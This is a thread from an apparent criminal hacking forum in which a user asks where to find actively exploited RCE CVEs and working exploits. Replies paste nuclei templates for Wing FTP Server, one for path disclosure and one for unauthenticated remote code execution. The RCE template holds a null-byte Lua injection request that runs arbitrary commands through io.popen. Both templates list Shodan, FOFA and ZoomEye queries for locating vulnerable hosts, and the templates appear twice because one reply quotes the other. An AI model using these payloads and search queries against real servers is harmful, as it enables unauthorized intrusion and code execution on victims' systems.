• XSS.stack #1 – первый литературный журнал от юзеров форума

Remote Question about exploit and cve searching

Отслеживать
eyna

eyna

CD-диск
Пользователь
Регистрация
07.01.2025
Сообщения
12
Реакции
1
Hello guys hope you have great time

I wanted to know were can i find rce and command injection cves like CVE-2025-47812(wing ftp) that are actually working and being exploited. i want to know the most being exploited vulnerability across the world with year specified like top 20 rce cve exploited in 2025 or 2024 and so on.

also wanted the know after finding cve ids where are best resources for getting their exploits (working and valid ones not trash things on the internet mostly not working).

thanks you
 
Сортировать по дате Сортировать по голосам
You can look nuclei -> https://docs.projectdiscovery.io/opensource/nuclei/overview
Here you can find all template for nuclei. -> https://xssforum.onion/threads/96312/post-1028061

Poc from list templates (from community, im not use this, just search for you):

CVE-2025-47813 => Path Disclosure via Overlong UID Cookie
Код: 
id: CVE-2025-47813

info:
  name: Wing FTP Server <= 7.4.3 - Path Disclosure via Overlong UID Cookie
  author: rcesecurity,pdteam
  severity: medium
  description: |
    Wing FTP Server versions prior to 7.4.4 are vulnerable to an authenticated information disclosure vulnerability (CVE-2025-47813).
    The vulnerability occurs due to improper validation of the 'UID' session cookie in the /loginok.html endpoint. Supplying an
    overlong UID value causes the server to respond with an error that includes the full local filesystem path. This can aid in further
    exploitation (e.g., CVE-2025-47812) by revealing the application’s file system layout.
  reference:
    - https://www.rcesecurity.com/2025/06/what-the-null-wing-ftp-server-rce-cve-2025-47812/
    - https://www.wftpserver.com
  classification:
    epss-score: 0.0088
    epss-percentile: 0.74606
    cve-id: CVE-2025-47813
    cwe-id: CWE-209
    cvss-score: 5.3
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:NH
  metadata:
    product: wftpserver
    vendor: wing_ftp_server
    verified: false
    shodan-query:
      - http.html_hash:2121146066
      - http.favicon.hash:963565804
      - title:"Wing FTP Server"
      - "Server: Wing FTP Server"
    fofa-query:
      - icon_hash="963565804"
      - title="Wing FTP Server"
    zoomeye-query:
      - app="Wing FTP Server"
  tags: cve,cve2025,wingftp,unauth,exposure,vuln

variables:
  longuid: "{{repeat('A', 2048)}}"

http:
  - method: POST
    path:
      - "{{BaseURL}}/loginok.html"

    headers:
      Cookie: "UID={{longuid}}"
      Content-Type: application/x-www-form-urlencoded

    body: "username=anonymous&password=test"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Server Path"
          - "Error"
          - ":\\\\"  # Windows path
          - "/usr/"  # Linux path
        condition: or

      - type: word
        part: header
        words:
          - "Wing FTP Server"

    extractors:
      - type: regex
        part: body
        regex:
          - '([a-zA-Z]:[\\/][^A\r\n]{10,})'

OR

CVE-2025-47812 => Remote Code Execution

Код: 
id: CVE-2025-47812

info:
  name: Wing FTP Server <= 7.4.3 - Remote Code Execution
  author: rcesecurity,4m3rr0r
  severity: critical
  description: |
    Wing FTP Server versions prior to 7.4.4 are vulnerable to an unauthenticated remote code execution (RCE) flaw (CVE-2025-47812).
    The vulnerability arises from improper NULL byte handling in the 'username' parameter during login, which allows Lua code injection
    into session files. These injected session files are executed when accessing authenticated endpoints such as /dir.html, resulting
    in arbitrary command execution with elevated privileges. This attack is possible only when anonymous login is enabled on the server.
  reference:
    - https://www.rcesecurity.com/2025/06/what-the-null-wing-ftp-server-rce-cve-2025-47812/
    - https://github.com/4m3rr0r/CVE-2025-47812-poc
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-47812
    epss-score: 0.9249
    epss-percentile: 0.9972
  metadata:
    verified: true
    product: wftpserver
    vendor: wing_ftp_server
    shodan-query:
      - http.html_hash:2121146066
      - http.favicon.hash:963565804
      - title:"Wing FTP Server"
      - "Server: Wing FTP Server"
    fofa-query:
      - icon_hash="963565804"
      - title="Wing FTP Server"
      - "Server: Wing FTP Server"
    zoomeye-query:
      - app="Wing FTP Server"
  tags: cve,cve2025,rce,wingftp,ftp,unauth,kev,vkev,vuln

variables:
  cmd: "echo CVE-2025-47812"

http:
  - raw:
      - |
        POST /loginok.html HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=anonymous%00]]%0dlocal+h+%3d+io.popen("{{cmd}}")%0dlocal+r+%3d+h%3aread("*a")%0dh%3aclose()%0dprint(r)%0d--&password=

  - raw:
      - |
        GET /dir.html HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(to_lower(body), "cve-2025-47812")'
        condition: and

I believe you can do it.
 
За 0 Против
Nick Diesel сказал(а):
You can look nuclei -> https://docs.projectdiscovery.io/opensource/nuclei/overview
Here you can find all template for nuclei. -> https://xssforum.onion/threads/96312/post-1028061

Poc from list templates (from community, im not use this, just search for you):

CVE-2025-47813 => Path Disclosure via Overlong UID Cookie
Код: 
id: CVE-2025-47813

info:
  name: Wing FTP Server <= 7.4.3 - Path Disclosure via Overlong UID Cookie
  author: rcesecurity,pdteam
  severity: medium
  description: |
    Wing FTP Server versions prior to 7.4.4 are vulnerable to an authenticated information disclosure vulnerability (CVE-2025-47813).
    The vulnerability occurs due to improper validation of the 'UID' session cookie in the /loginok.html endpoint. Supplying an
    overlong UID value causes the server to respond with an error that includes the full local filesystem path. This can aid in further
    exploitation (e.g., CVE-2025-47812) by revealing the application’s file system layout.
  reference:
    - https://www.rcesecurity.com/2025/06/what-the-null-wing-ftp-server-rce-cve-2025-47812/
    - https://www.wftpserver.com
  classification:
    epss-score: 0.0088
    epss-percentile: 0.74606
    cve-id: CVE-2025-47813
    cwe-id: CWE-209
    cvss-score: 5.3
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:NH
  metadata:
    product: wftpserver
    vendor: wing_ftp_server
    verified: false
    shodan-query:
      - http.html_hash:2121146066
      - http.favicon.hash:963565804
      - title:"Wing FTP Server"
      - "Server: Wing FTP Server"
    fofa-query:
      - icon_hash="963565804"
      - title="Wing FTP Server"
    zoomeye-query:
      - app="Wing FTP Server"
  tags: cve,cve2025,wingftp,unauth,exposure,vuln

variables:
  longuid: "{{repeat('A', 2048)}}"

http:
  - method: POST
    path:
      - "{{BaseURL}}/loginok.html"

    headers:
      Cookie: "UID={{longuid}}"
      Content-Type: application/x-www-form-urlencoded

    body: "username=anonymous&password=test"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Server Path"
          - "Error"
          - ":\\\\"  # Windows path
          - "/usr/"  # Linux path
        condition: or

      - type: word
        part: header
        words:
          - "Wing FTP Server"

    extractors:
      - type: regex
        part: body
        regex:
          - '([a-zA-Z]:[\\/][^A\r\n]{10,})'

OR

CVE-2025-47812 => Remote Code Execution

Код: 
id: CVE-2025-47812

info:
  name: Wing FTP Server <= 7.4.3 - Remote Code Execution
  author: rcesecurity,4m3rr0r
  severity: critical
  description: |
    Wing FTP Server versions prior to 7.4.4 are vulnerable to an unauthenticated remote code execution (RCE) flaw (CVE-2025-47812).
    The vulnerability arises from improper NULL byte handling in the 'username' parameter during login, which allows Lua code injection
    into session files. These injected session files are executed when accessing authenticated endpoints such as /dir.html, resulting
    in arbitrary command execution with elevated privileges. This attack is possible only when anonymous login is enabled on the server.
  reference:
    - https://www.rcesecurity.com/2025/06/what-the-null-wing-ftp-server-rce-cve-2025-47812/
    - https://github.com/4m3rr0r/CVE-2025-47812-poc
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-47812
    epss-score: 0.9249
    epss-percentile: 0.9972
  metadata:
    verified: true
    product: wftpserver
    vendor: wing_ftp_server
    shodan-query:
      - http.html_hash:2121146066
      - http.favicon.hash:963565804
      - title:"Wing FTP Server"
      - "Server: Wing FTP Server"
    fofa-query:
      - icon_hash="963565804"
      - title="Wing FTP Server"
      - "Server: Wing FTP Server"
    zoomeye-query:
      - app="Wing FTP Server"
  tags: cve,cve2025,rce,wingftp,ftp,unauth,kev,vkev,vuln

variables:
  cmd: "echo CVE-2025-47812"

http:
  - raw:
      - |
        POST /loginok.html HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=anonymous%00]]%0dlocal+h+%3d+io.popen("{{cmd}}")%0dlocal+r+%3d+h%3aread("*a")%0dh%3aclose()%0dprint(r)%0d--&password=

  - raw:
      - |
        GET /dir.html HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(to_lower(body), "cve-2025-47812")'
        condition: and

I believe you can do it.
Good method sir thanks
 
За 0 Против
eyna сказал(а):
Hello guys hope you have great time

I wanted to know were can i find rce and command injection cves
My favorite cve search tool is opencve

eyna сказал(а):
Hello guys hope you have great time

I wanted to know were can i find rce and command injection cves like CVE-2025-47812(wing ftp) that are actually working and being exploited.
CVE-2025-47812(wing ftp) is not working or being exploited, it's over hyped, and it requires anonymous login to be enabled (which isn't enabled by default). I just tested this CVE Today, this almost never works in real-world scenarios.

eyna сказал(а):
also wanted the know after finding cve ids where are best resources for getting their exploits (working and valid ones not trash things on the internet mostly not working).

thanks you
you need to write your own. 90% of exploits online are trash because they don't work, or they only work on very low value targets
 
За 0 Против
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх